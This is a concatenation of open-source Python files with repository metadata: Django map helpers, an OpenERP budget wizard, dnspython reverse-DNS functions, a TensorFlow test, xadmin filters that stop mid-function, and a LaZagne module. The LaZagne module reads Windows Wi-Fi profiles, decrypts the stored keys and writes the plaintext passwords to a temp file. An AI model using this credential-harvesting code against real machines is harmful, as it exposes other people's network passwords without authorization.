self.key = settings.GOOGLE_MAPS_API_KEY
except AttributeError:
raise GoogleMapException(
'Google Maps API Key not found (try adding '
'GOOGLE_MAPS_API_KEY to your settings).'
)
else:
self.key = key
# Getting the Google Maps API version, defaults to using the latest ("2.x"),
# this is not necessarily the most stable.
if not version:
self.version = getattr(settings, 'GOOGLE_MAPS_API_VERSION', '2.x')
else:
self.version = version
# Can specify the API URL in the `api_url` keyword.
if not api_url:
self.api_url = getattr(settings, 'GOOGLE_MAPS_URL', GOOGLE_MAPS_URL) % self.version
else:
self.api_url = api_url
# Setting the DOM id of the map, the load function, the JavaScript
# template, and the KML URLs array.
self.dom_id = dom_id
self.extra_context = extra_context
self.js_module = js_module
self.template = template
self.kml_urls = kml_urls
# Does the user want any GMarker, GPolygon, and/or GPolyline overlays?
overlay_info = [[GMarker, markers, 'markers'],
[GPolygon, polygons, 'polygons'],
[GPolyline, polylines, 'polylines']]
for overlay_class, overlay_list, varname in overlay_info:
setattr(self, varname, [])
if overlay_list:
for overlay in overlay_list:
if isinstance(overlay, overlay_class):
getattr(self, varname).append(overlay)
else:
getattr(self, varname).append(overlay_class(overlay))
# If GMarker, GPolygons, and/or GPolylines are used the zoom will be
# automatically calculated via the Google Maps API. If both a zoom
# level and a center coordinate are provided with polygons/polylines,
# no automatic determination will occur.
self.calc_zoom = False
if self.polygons or self.polylines or self.markers:
if center is None or zoom is None:
self.calc_zoom = True
# Defaults for the zoom level and center coordinates if the zoom
# is not automatically calculated.
if zoom is None:
zoom = 4
self.zoom = zoom
if center is None:
center = (0, 0)
self.center = center
def render(self):
"""
Generates the JavaScript necessary for displaying this Google Map.
"""
params = {'calc_zoom': self.calc_zoom,
'center': self.center,
'dom_id': self.dom_id,
'js_module': self.js_module,
'kml_urls': self.kml_urls,
'zoom': self.zoom,
'polygons': self.polygons,
'polylines': self.polylines,
'icons': self.icons,
'markers': self.markers,
}
params.update(self.extra_context)
return render_to_string(self.template, params)
@property
def body(self):
"Returns HTML body tag for loading and unloading Google Maps javascript."
return format_html('<body {} {}>', self.onload, self.onunload)
@property
def onload(self):
"Returns the `onload` HTML <body> attribute."
return format_html('onload="{}.{}_load()"', self.js_module, self.dom_id)
@property
def api_script(self):
"Returns the <script> tag for the Google Maps API javascript."
return format_html('<script src="{}{}" type="text/javascript"></script>',
self.api_url, self.key)
@property
def js(self):
"Returns only the generated Google Maps JavaScript (no <script> tags)."
return self.render()
@property
def scripts(self):
"Returns all <script></script> tags required with Google Maps JavaScript."
return format_html('{}\n <script type="text/javascript">\n//<![CDATA[\n{}//]]>\n </script>',
self.api_script, mark_safe(self.js))
@property
def style(self):
"Returns additional CSS styling needed for Google Maps on IE."
return format_html('<style type="text/css">{}</style>', self.vml_css)
@property
def xhtml(self):
"Returns XHTML information needed for IE VML overlays."
return format_html('<html xmlns="http://www.w3.org/1999/xhtml" {}>', self.xmlns)
@property
def icons(self):
"Returns a sequence of GIcon objects in this map."
return set(marker.icon for marker in self.markers if marker.icon)
class GoogleMapSet(GoogleMap):
def __init__(self, *args, **kwargs):
"""
A class for generating sets of Google Maps that will be shown on the
same page together.
Example:
gmapset = GoogleMapSet( GoogleMap( ... ), GoogleMap( ... ) )
gmapset = GoogleMapSet( [ gmap1, gmap2] )
"""
# The `google-multi.js` template is used instead of `google-single.js`
# by default.
template = kwargs.pop('template', 'gis/google/google-multi.js')
# This is the template used to generate the GMap load JavaScript for
# each map in the set.
self.map_template = kwargs.pop('map_template', 'gis/google/google-single.js')
# Running GoogleMap.__init__(), and resetting the template
# value with default obtained above.
super(GoogleMapSet, self).__init__(**kwargs)
self.template = template
# If a tuple/list passed in as first element of args, then assume
if isinstance(args[0], (tuple, list)):
self.maps = args[0]
else:
self.maps = args
# Generating DOM ids for each of the maps in the set.
self.dom_ids = ['map%d' % i for i in range(len(self.maps))]
def load_map_js(self):
"""
Returns JavaScript containing all of the loading routines for each
map in this set.
"""
result = []
for dom_id, gmap in zip(self.dom_ids, self.maps):
# Backup copies the GoogleMap DOM id and template attributes.
# They are overridden on each GoogleMap instance in the set so
# that only the loading JavaScript (and not the header variables)
# is used with the generated DOM ids.
tmp = (gmap.template, gmap.dom_id)
gmap.template = self.map_template
gmap.dom_id = dom_id
result.append(gmap.js)
# Restoring the backup values.
gmap.template, gmap.dom_id = tmp
return mark_safe(''.join(result))
def render(self):
"""
Generates the JavaScript for the collection of Google Maps in
this set.
"""
params = {'js_module': self.js_module,
'dom_ids': self.dom_ids,
'load_map_js': self.load_map_js(),
'icons': self.icons,
}
params.update(self.extra_context)
return render_to_string(self.template, params)
@property
def onload(self):
"Returns the `onload` HTML <body> attribute."
# Overloaded to use the `load` function defined in the
# `google-multi.js`, which calls the load routines for
# each one of the individual maps in the set.
return mark_safe('onload="%s.load()"' % self.js_module)
@property
def icons(self):
"Returns a sequence of all icons in each map of the set."
icons = set()
for map in self.maps:
icons |= map.icons
return icons
| bsd-3-clause |
Antiun/c2c-rd-addons | c2c_budget_chricar/wizard/compare_versions.py | 4 | 5558 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) Camptocamp SA - http://www.camptocamp.com
# Author: Arnaud WÃŒst
#
# This file is part of the c2c_budget module
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
#import pooler
class wiz_compare_versions(wizard.interface):
""" display options to print the report that compare two versions """
def _init_fields(self, cr, uid, data, context):
""" init the form's fields """
budget_obj = pooler.get_pool(cr.dbname).get('c2c_budget')
res = {}
#we come from budget
if data['model'] == 'c2c_budget':
budget_obj = pooler.get_pool(cr.dbname).get('c2c_budget')
#init version and version 2 with the 2 first versions
if len(data['ids']) >= 1:
budget = budget_obj.browse(cr, uid, data['ids'][0])
if len(budget.budget_version_ids) >= 1:
res['version_1'] = budget.budget_version_ids[0].id
res['currency'] = budget.budget_version_ids[0].currency_id.id
if len(budget.budget_version_ids) >= 2:
res['version_2'] = budget.budget_version_ids[1].id
#we come from versions
elif data['model'] == 'c2c_budget.version':
version_obj = pooler.get_pool(cr.dbname).get('c2c_budget.version')
#init version and version 2 with the 2 first versions
if len(data['ids']) >= 1:
res['version_1'] = data['ids'][0]
res['currency'] = version_obj.browse(cr, uid, data['ids'][0], context=context).currency_id.id
if len(data['ids']) >= 2:
res['version_2'] = data['ids'][1]
return res
def _get_budget_lines(self, cr, uid, data, context):
""" retrieve lines to work on """
#checkthe two versions belongs to the same budget
version_obj = pooler.get_pool(cr.dbname).get('c2c_budget.version')
versions = version_obj.browse(cr, uid, [data['form']['version_1'], data['form']['version_2']], context=context)
if versions[0].budget_id.id != versions[1].budget_id.id:
raise wizard.except_wizard('Incompatible Versions', "The two selected versions do not belong to the same budget. Select two versions of the same budget to run the report")
#find lines to work on
line_obj = pooler.get_pool(cr.dbname).get('c2c_budget.line')
period_obj = pooler.get_pool(cr.dbname).get('account.period')
criteria = [('budget_version_id', 'in', [data['form']['version_1'], data['form']['version_2']])]
if len(data['form']['periods'][0][2]) > 0:
criteria.append(('period_id', 'in', data['form']['periods'][0][2]))
line_ids = line_obj.search(cr, uid, criteria, context=context)
values = {'ids': line_ids
}
return values
_form = """<?xml version="1.0"?>
<form string="Versions Comparing" width="800">
<field name="version_1" />
<field name="version_2" />
<newline/>
<field name="currency" />
<newline/>
<separator string="Select periods (empty for all)" colspan="4"/>
<field name="periods" colspan="4" nolabel="1" height="200" />
</form>"""
_fields = {
'version_1': {'string':'Version 1', 'type':'many2one', 'relation':'c2c_budget.version', 'required':True },
'version_2': {'string':'Version 2', 'type':'many2one', 'relation':'c2c_budget.version', 'required':True },
'currency': {'string':'Currency' , 'type':'many2one', 'relation':'res.currency', 'required':True },
'periods': {'string':'Periods' , 'type':'many2many','relation':'account.period'},
}
states = {
'init' : {
'actions':[_init_fields],
'result' : {'type':'form', 'arch':_form, 'fields':_fields, 'state': [('end','Cancel'),('print','Print')]},
},
'print' : {
'actions' : [_get_budget_lines],
'result' : {'type':'print', 'report':'compare_versions', 'get_id_from_action':True, 'state':'end'},
},
}
wiz_compare_versions('compare.budget.versions') | agpl-3.0 |
edumatos/namebench | nb_third_party/dns/reversename.py | 248 | 2931 | # Copyright (C) 2006, 2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS Reverse Map Names.
@var ipv4_reverse_domain: The DNS IPv4 reverse-map domain, in-addr.arpa.
@type ipv4_reverse_domain: dns.name.Name object
@var ipv6_reverse_domain: The DNS IPv6 reverse-map domain, ip6.arpa.
@type ipv6_reverse_domain: dns.name.Name object
"""
import dns.name
import dns.ipv6
import dns.ipv4
ipv4_reverse_domain = dns.name.from_text('in-addr.arpa.')
ipv6_reverse_domain = dns.name.from_text('ip6.arpa.')
def from_address(text):
"""Convert an IPv4 or IPv6 address in textual form into a Name object whose
value is the reverse-map domain name of the address.
@param text: an IPv4 or IPv6 address in textual form (e.g. '127.0.0.1',
'::1')
@type text: str
@rtype: dns.name.Name object
"""
try:
parts = list(dns.ipv6.inet_aton(text).encode('hex_codec'))
origin = ipv6_reverse_domain
except:
parts = ['%d' % ord(byte) for byte in dns.ipv4.inet_aton(text)]
origin = ipv4_reverse_domain
parts.reverse()
return dns.name.from_text('.'.join(parts), origin=origin)
def to_address(name):
"""Convert a reverse map domain name into textual address form.
@param name: an IPv4 or IPv6 address in reverse-map form.
@type name: dns.name.Name object
@rtype: str
"""
if name.is_subdomain(ipv4_reverse_domain):
name = name.relativize(ipv4_reverse_domain)
labels = list(name.labels)
labels.reverse()
text = '.'.join(labels)
# run through inet_aton() to check syntax and make pretty.
return dns.ipv4.inet_ntoa(dns.ipv4.inet_aton(text))
elif name.is_subdomain(ipv6_reverse_domain):
name = name.relativize(ipv6_reverse_domain)
labels = list(name.labels)
labels.reverse()
parts = []
i = 0
l = len(labels)
while i < l:
parts.append(''.join(labels[i:i+4]))
i += 4
text = ':'.join(parts)
# run through inet_aton() to check syntax and make pretty.
return dns.ipv6.inet_ntoa(dns.ipv6.inet_aton(text))
else:
raise dns.exception.SyntaxError('unknown reverse-map address family')
| apache-2.0 |
benoitsteiner/tensorflow | tensorflow/python/grappler/memory_optimizer_test.py | 12 | 3336 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the swig wrapper tf_optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class MemoryOptimizerTest(test.TestCase):
"""Tests the Grappler memory optimizer."""
def testNoSwapping(self):
"""Make sure the graph is preserved when there is nothing to swap."""
a = constant_op.constant(10, name='a')
b = constant_op.constant(20, name='b')
c = math_ops.add_n([a, b], name='c')
d = math_ops.add_n([b, c], name='d')
train_op = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)
train_op.append(d)
mg = meta_graph.create_meta_graph_def(graph=ops.get_default_graph())
rewriter_config = rewriter_config_pb2.RewriterConfig(
memory_optimization=rewriter_config_pb2.RewriterConfig.MANUAL)
graph = tf_optimizer.OptimizeGraph(rewriter_config, mg)
self.assertEqual(len(graph.node), 4)
self.assertItemsEqual([node.name
for node in graph.node], ['a', 'b', 'c', 'd'])
def testSimpleSwap(self):
"""Check that the swap annotations are followed."""
a = constant_op.constant(10, name='a')
b = constant_op.constant(20, name='b')
c = math_ops.add_n([a, b], name='c')
d = math_ops.add_n([b, c], name='d')
train_op = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)
train_op.append(d)
d.op.node_def.attr['_swap_to_host'].i = 0
mg = meta_graph.create_meta_graph_def(graph=ops.get_default_graph())
rewriter_config = rewriter_config_pb2.RewriterConfig(
memory_optimization=rewriter_config_pb2.RewriterConfig.MANUAL)
graph = tf_optimizer.OptimizeGraph(rewriter_config, mg)
self.assertEqual(len(graph.node), 6)
self.assertItemsEqual([node.name for node in graph.node], [
'a',
'b',
'c',
'd',
'swap_in_d_0',
'swap_out_d_0',
])
for node in graph.node:
if node.name == 'swap_in_d_0':
self.assertEqual('swap_out_d_0', node.input[0])
self.assertEqual('^b', node.input[1])
elif node.name == 'swap_out_d_0':
self.assertEqual('b', node.input[0])
elif node.name == 'd':
self.assertEqual('swap_in_d_0', node.input[0])
self.assertEqual('c', node.input[1])
if __name__ == '__main__':
test.main()
| apache-2.0 |
rgfernandes/LaZagne | Windows/src/LaZagne/softwares/wifi/wifipass.py | 11 | 2712 | import xml.etree.cElementTree as ET
import os, win32crypt
import binascii
import tempfile, socket
from ctypes import *
from config.moduleInfo import ModuleInfo
import argparse
class WifiPass(ModuleInfo):
def __init__(self):
options = {'command': '--HiddenWifiArgs', 'action': 'store_true', 'dest': 'wifipass', 'help': argparse.SUPPRESS}
ModuleInfo.__init__(self, 'wifipass', 'wifi', options)
# used when launched with a system account
def run(self):
# need to be admin privilege, to find passwords
if not windll.Shell32.IsUserAnAdmin():
return
else:
directory = ''
if 'ALLUSERSPROFILE' in os.environ:
directory = os.environ['ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces'
# for windows Vista or higher
if os.path.exists(directory):
passwordFound = False
rep = []
pwdFound = []
for repository in os.listdir(directory):
if os.path.isdir(directory + os.sep + repository):
rep = directory + os.sep + repository
for file in os.listdir(rep):
values = {}
if os.path.isfile(rep + os.sep + file):
f = rep + os.sep + file
tree = ET.ElementTree(file=f)
root = tree.getroot()
xmlns = root.tag.split("}")[0] + '}'
iterate = False
for elem in tree.iter():
if elem.tag.endswith('SSID'):
for w in elem:
if w.tag == xmlns + 'name':
values['SSID'] = w.text
if elem.tag.endswith('authentication'):
values['Authentication'] = elem.text
if elem.tag.endswith('protected'):
values['Protected'] = elem.text
if elem.tag.endswith('keyMaterial'):
key = elem.text
try:
binary_string = binascii.unhexlify(key)
password = win32crypt.CryptUnprotectData(binary_string, None, None, None, 0)[1]
values['Password'] = password
passwordFound = True
except:
values['INFO'] = '[!] Password not found.'
# store credentials
if len(values) != 0:
pwdFound.append(values)
# If at least one password has been found, we create the file in temp directory
if passwordFound:
try:
filepath = tempfile.gettempdir()
tmp = ''
cpt = 1
for pwd in pwdFound:
tmp += '[wifi%s]\r\n' % str(cpt)
cpt += 1
for p in pwd.keys():
tmp = str(tmp) + str(p) + '=' + str(pwd[p]) + '\r\n'
tmp = str(tmp) + '\r\n'
open(filepath + os.sep + 'TEMP123A.txt','w').write(tmp)
except:
pass
| lgpl-3.0 |
LiZoRN/Charlotte | extra_apps/xadmin/filters.py | 11 | 22134 | from __future__ import absolute_import
from django.db import models
from django.core.exceptions import ImproperlyConfigured
from django.utils.encoding import smart_text
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.template.loader import get_template
from django.template.context import Context
from django.utils import six
from django.utils.safestring import mark_safe
from django.utils.html import escape,format_html
from django.utils.text import Truncator
from django.core.cache import cache, caches
from xadmin.views.list import EMPTY_CHANGELIST_VALUE
from xadmin.util import is_related_field,is_related_field2
import datetime
FILTER_PREFIX = '_p_'
SEARCH_VAR = '_q_'
from .util import (get_model_from_relation,
reverse_field_path, get_limit_choices_to_from_path, prepare_lookup_value)
class BaseFilter(object):
title = None
template = 'xadmin/filters/list.html'
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
pass
def __init__(self, request, params, model, admin_view):
self.used_params = {}
self.request = request
self.params = params
self.model = model
self.admin_view = admin_view
if self.title is None:
raise ImproperlyConfigured(
"The filter '%s' does not specify "
"a 'title'." % self.__class__.__name__)
def query_string(self, new_params=None, remove=None):
return self.admin_view.get_query_string(new_params, remove)
def form_params(self):
arr = map(lambda k: FILTER_PREFIX + k, self.used_params.keys())
if six.PY3:
arr = list(arr)
return self.admin_view.get_form_params(remove=arr)
def has_output(self):
"""
Returns True if some choices would be output for this filter.
"""
raise NotImplementedError
@property
def is_used(self):
return len(self.used_params) > 0
def do_filte(self, queryset):
"""
Returns the filtered queryset.
"""
raise NotImplementedError
def get_context(self):
return {'title': self.title, 'spec': self, 'form_params': self.form_params()}
def __str__(self):
tpl = get_template(self.template)
return mark_safe(tpl.render(context=self.get_context()))
class FieldFilterManager(object):
_field_list_filters = []
_take_priority_index = 0
def register(self, list_filter_class, take_priority=False):
if take_priority:
# This is to allow overriding the default filters for certain types
# of fields with some custom filters. The first found in the list
# is used in priority.
self._field_list_filters.insert(
self._take_priority_index, list_filter_class)
self._take_priority_index += 1
else:
self._field_list_filters.append(list_filter_class)
return list_filter_class
def create(self, field, request, params, model, admin_view, field_path):
for list_filter_class in self._field_list_filters:
if not list_filter_class.test(field, request, params, model, admin_view, field_path):
continue
return list_filter_class(field, request, params,
model, admin_view, field_path=field_path)
manager = FieldFilterManager()
class FieldFilter(BaseFilter):
lookup_formats = {}
def __init__(self, field, request, params, model, admin_view, field_path):
self.field = field
self.field_path = field_path
self.title = getattr(field, 'verbose_name', field_path)
self.context_params = {}
super(FieldFilter, self).__init__(request, params, model, admin_view)
for name, format in self.lookup_formats.items():
p = format % field_path
self.context_params["%s_name" % name] = FILTER_PREFIX + p
if p in params:
value = prepare_lookup_value(p, params.pop(p))
self.used_params[p] = value
self.context_params["%s_val" % name] = value
else:
self.context_params["%s_val" % name] = ''
arr = map(
lambda kv: setattr(self, 'lookup_' + kv[0], kv[1]),
self.context_params.items()
)
if six.PY3:
list(arr)
def get_context(self):
context = super(FieldFilter, self).get_context()
context.update(self.context_params)
obj = map(lambda k: FILTER_PREFIX + k, self.used_params.keys())
if six.PY3:
obj = list(obj)
context['remove_url'] = self.query_string({}, obj)
return context
def has_output(self):
return True
def do_filte(self, queryset):
return queryset.filter(**self.used_params)
class ListFieldFilter(FieldFilter):
template = 'xadmin/filters/list.html'
def get_context(self):
context = super(ListFieldFilter, self).get_context()
context['choices'] = list(self.choices())
return context
@manager.register
class BooleanFieldListFilter(ListFieldFilter):
lookup_formats = {'exact': '%s__exact', 'isnull': '%s__isnull'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return isinstance(field, (models.BooleanField, models.NullBooleanField))
def choices(self):
for lookup, title in (
('', _('All')),
('1', _('Yes')),
('0', _('No')),
):
yield {
'selected': (
self.lookup_exact_val == lookup
and not self.lookup_isnull_val
),
'query_string': self.query_string(
{self.lookup_exact_name: lookup},
[self.lookup_isnull_name],
),
'display': title,
}
if isinstance(self.field, models.NullBooleanField):
yield {
'selected': self.lookup_isnull_val == 'True',
'query_string': self.query_string(
{self.lookup_isnull_name: 'True'},
[self.lookup_exact_name],
),
'display': _('Unknown'),
}
@manager.register
class ChoicesFieldListFilter(ListFieldFilter):
lookup_formats = {'exact': '%s__exact'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return bool(field.choices)
def choices(self):
yield {
'selected': self.lookup_exact_val is '',
'query_string': self.query_string({}, [self.lookup_exact_name]),
'display': _('All')
}
for lookup, title in self.field.flatchoices:
yield {
'selected': smart_text(lookup) == self.lookup_exact_val,
'query_string': self.query_string({self.lookup_exact_name: lookup}),
'display': title,
}
@manager.register
class TextFieldListFilter(FieldFilter):
template = 'xadmin/filters/char.html'
lookup_formats = {'in': '%s__in', 'search': '%s__contains'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return (
isinstance(field, models.CharField)
and field.max_length > 20
or isinstance(field, models.TextField)
)
@manager.register
class NumberFieldListFilter(FieldFilter):
template = 'xadmin/filters/number.html'
lookup_formats = {'equal': '%s__exact', 'lt': '%s__lt', 'gt': '%s__gt',
'ne': '%s__ne', 'lte': '%s__lte', 'gte': '%s__gte',
}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return isinstance(field, (models.DecimalField, models.FloatField, models.IntegerField))
def do_filte(self, queryset):
params = self.used_params.copy()
ne_key = '%s__ne' % self.field_path
if ne_key in params:
queryset = queryset.exclude(
**{self.field_path: params.pop(ne_key)})
return queryset.filter(**params)
@manager.register
class DateFieldListFilter(ListFieldFilter):
template = 'xadmin/filters/date.html'
lookup_formats = {'since': '%s__gte', 'until': '%s__lt',
'year': '%s__year', 'month': '%s__month', 'day': '%s__day',
'isnull': '%s__isnull'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return isinstance(field, models.DateField)
def __init__(self, field, request, params, model, admin_view, field_path):
self.field_generic = '%s__' % field_path
self.date_params = dict([(FILTER_PREFIX + k, v) for k, v in params.items()
if k.startswith(self.field_generic)])
super(DateFieldListFilter, self).__init__(
field, request, params, model, admin_view, field_path)
now = timezone.now()
# When time zone support is enabled, convert "now" to the user's time
# zone so Django's definition of "Today" matches what the user expects.
if now.tzinfo is not None:
current_tz = timezone.get_current_timezone()
now = now.astimezone(current_tz)
if hasattr(current_tz, 'normalize'):
# available for pytz time zones
now = current_tz.normalize(now)
if isinstance(field, models.DateTimeField):
today = now.replace(hour=0, minute=0, second=0, microsecond=0)
else: # field is a models.DateField
today = now.date()
tomorrow = today + datetime.timedelta(days=1)
self.links = (
(_('Any date'), {}),
(_('Has date'), {
self.lookup_isnull_name: False
}),
(_('Has no date'), {
self.lookup_isnull_name: 'True'
}),
(_('Today'), {
self.lookup_since_name: str(today),
self.lookup_until_name: str(tomorrow),
}),
(_('Past 7 days'), {
self.lookup_since_name: str(today - datetime.timedelta(days=7)),
self.lookup_until_name: str(tomorrow),
}),
(_('This month'), {
self.lookup_since_name: str(today.replace(day=1)),
self.lookup_until_name: str(tomorrow),
}),
(_('This year'), {
self.lookup_since_name: str(today.replace(month=1, day=1)),
self.lookup_until_name: str(tomorrow),
}),
)
def get_context(self):
context = super(DateFieldListFilter, self).get_context()
context['choice_selected'] = bool(self.lookup_year_val) or bool(self.lookup_month_val) \
or bool(self.lookup_day_val)
return context
def choices(self):
for title, param_dict in self.links:
yield {
'selected': self.date_params == param_dict,
'query_string': self.query_string(
param_dict, [FILTER_PREFIX + self.field_generic]),
'display': title,
}
@manager.register
class RelatedFieldSearchFilter(FieldFilter):
template = 'xadmin/filters/fk_search.html'
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
if not is_related_field2(field):
return False
related_modeladmin = admin_view.admin_site._registry.get(
get_model_from_relation(field))
return related_modeladmin and getattr(related_modeladmin, 'relfield_style', None) in ('fk-ajax', 'fk-select')
def __init__(self, field, request, params, model, model_admin, field_path):
other_model = get_model_from_relation(field)
if hasattr(field, 'rel'):
rel_name = field.rel.get_related_field().name
else:
rel_name = other_model._meta.pk.name
self.lookup_formats = {'in': '%%s__%s__in' % rel_name,'exact': '%%s__%s__exact' % rel_name}
super(RelatedFieldSearchFilter, self).__init__(
field, request, params, model, model_admin, field_path)
related_modeladmin = self.admin_view.admin_site._registry.get(other_model)
self.relfield_style = related_modeladmin.relfield_style
if hasattr(field, 'verbose_name'):
self.lookup_title = field.verbose_name
else:
self.lookup_title = other_model._meta.verbose_name
self.title = self.lookup_title
self.search_url = model_admin.get_admin_url('%s_%s_changelist' % (
other_model._meta.app_label, other_model._meta.model_name))
self.label = self.label_for_value(other_model, rel_name, self.lookup_exact_val) if self.lookup_exact_val else ""
self.choices = '?'
if field.rel.limit_choices_to:
for i in list(field.rel.limit_choices_to):
self.choices += "&_p_%s=%s" % (i, field.rel.limit_choices_to[i])
self.choices = format_html(self.choices)
def label_for_value(self, other_model, rel_name, value):
try:
obj = other_model._default_manager.get(**{rel_name: value})
return '%s' % escape(Truncator(obj).words(14, truncate='...'))
except (ValueError, other_model.DoesNotExist):
return ""
def get_context(self):
context = super(RelatedFieldSearchFilter, self).get_context()
context['search_url'] = self.search_url
context['label'] = self.label
context['choices'] = self.choices
context['relfield_style'] = self.relfield_style
return context
@manager.register
class RelatedFieldListFilter(ListFieldFilter):
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return is_related_field2(field)
def __init__(self, field, request, params, model, model_admin, field_path):
other_model = get_model_from_relation(field)
if hasattr(field, 'rel'):
rel_name = field.rel.get_related_field().name
else:
rel_name = other_model._meta.pk.name
self.lookup_formats = {'in': '%%s__%s__in' % rel_name,'exact': '%%s__%s__exact' %
rel_name, 'isnull': '%s__isnull'}
self.lookup_choices = field.get_choices(include_blank=False)
super(RelatedFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
if hasattr(field, 'verbose_name'):
self.lookup_title = field.verbose_name
else:
self.lookup_title = other_model._meta.verbose_name
self.title = self.lookup_title
def has_output(self):
if (is_related_field(self.field)
and self.field.field.null or hasattr(self.field, 'rel')
and self.field.null):
extra = 1
else:
extra = 0
return len(self.lookup_choices) + extra > 1
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg_isnull]
def choices(self):
yield {
'selected': self.lookup_exact_val == '' and not self.lookup_isnull_val,
'query_string': self.query_string({},
[self.lookup_exact_name, self.lookup_isnull_name]),
'display': _('All'),
}
for pk_val, val in self.lookup_choices:
yield {
'selected': self.lookup_exact_val == smart_text(pk_val),
'query_string': self.query_string({
self.lookup_exact_name: pk_val,
}, [self.lookup_isnull_name]),
'display': val,
}
if (is_related_field(self.field)
and self.field.field.null or hasattr(self.field, 'rel')
and self.field.null):
yield {
'selected': bool(self.lookup_isnull_val),
'query_string': self.query_string({
self.lookup_isnull_name: 'True',
}, [self.lookup_exact_name]),
'display': EMPTY_CHANGELIST_VALUE,
}
@manager.register
class MultiSelectFieldListFilter(ListFieldFilter):
""" Delegates the filter to the default filter and ors the results of each
Lists the distinct values of each field as a checkbox
Uses the default spec for each
"""
template = 'xadmin/filters/checklist.html'
lookup_formats = {'in': '%s__in'}
cache_config = {'enabled':False,'key':'quickfilter_%s','timeout':3600,'cache':'default'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return True
def get_cached_choices(self):
if not self.cache_config['enabled']:
return None
c = caches(self.cache_config['cache'])
return c.get(self.cache_config['key']%self.field_path)
def set_cached_choices(self,choices):
if not self.cache_config['enabled']:
return
c = caches(self.cache_config['cache'])
return c.set(self.cache_config['key']%self.field_path,choices)
def __init__(self, field, request, params, model, model_admin, field_path,field_order_by=None,field_limit=None,sort_key=None,cache_config=None):
super(MultiSelectFieldListFilter,self).__init__(field, request, params, model, model_admin, field_path)
# Check for it in the cachce
if cache_config is not None and type(cache_config)==dict:
self.cache_config.update(cache_config)
if self.cache_config['enabled']:
self.field_path = field_path
choices = self.get_cached_choices()
if choices:
self.lookup_choices = choices
return
# Else rebuild it
queryset = self.admin_view.queryset().exclude(**{"%s__isnull"%field_path:True}).values_list(field_path, flat=True).distinct()
#queryset = self.admin_view.queryset().distinct(field_path).exclude(**{"%s__isnull"%field_path:True})
if field_order_by is not None:
# Do a subquery to order the distinct set
queryset = self.admin_view.queryset().filter(id__in=queryset).order_by(field_order_by)
if field_limit is not None and type(field_limit)==int and queryset.count()>field_limit:
queryset = queryset[:field_limit]
self.lookup_choices = [str(it) for it in queryset.values_list(field_path,flat=True) if str(it).strip()!=""]
if sort_key is not None:
self.lookup_choices = sorted(self.lookup_choices,key=sort_key)
if self.cache_config['enabled']:
self.set_cached_choices(self.lookup_choices)
def choices(self):
self.lookup_in_val = (type(self.lookup_in_val) in (tuple,list)) and self.lookup_in_val or list(self.lookup_in_val)
yield {
'selected': len(self.lookup_in_val) == 0,
'query_string': self.query_string({},[self.lookup_in_name]),
'display': _('All'),
}
for val in self.lookup_choices:
yield {
'selected': smart_text(val) in self.lookup_in_val,
'query_string': self.query_string({self.lookup_in_name: ",".join([val]+self.lookup_in_val),}),
'remove_query_string': self.query_string({self.lookup_in_name: ",".join([v for v in self.lookup_in_val if v != val]),}),
'display': val,
}
@manager.register
class AllValuesFieldListFilter(ListFieldFilter):
lookup_formats = {'exact': '%s__exact', 'isnull': '%s__isnull'}
@classmethod
def test(cls, field, request, params, model, admin_view, field_path):
return True
def __init__(self, field, request, params, model, admin_view, field_path):
parent_model, reverse_path = reverse_field_path(model, field_path)
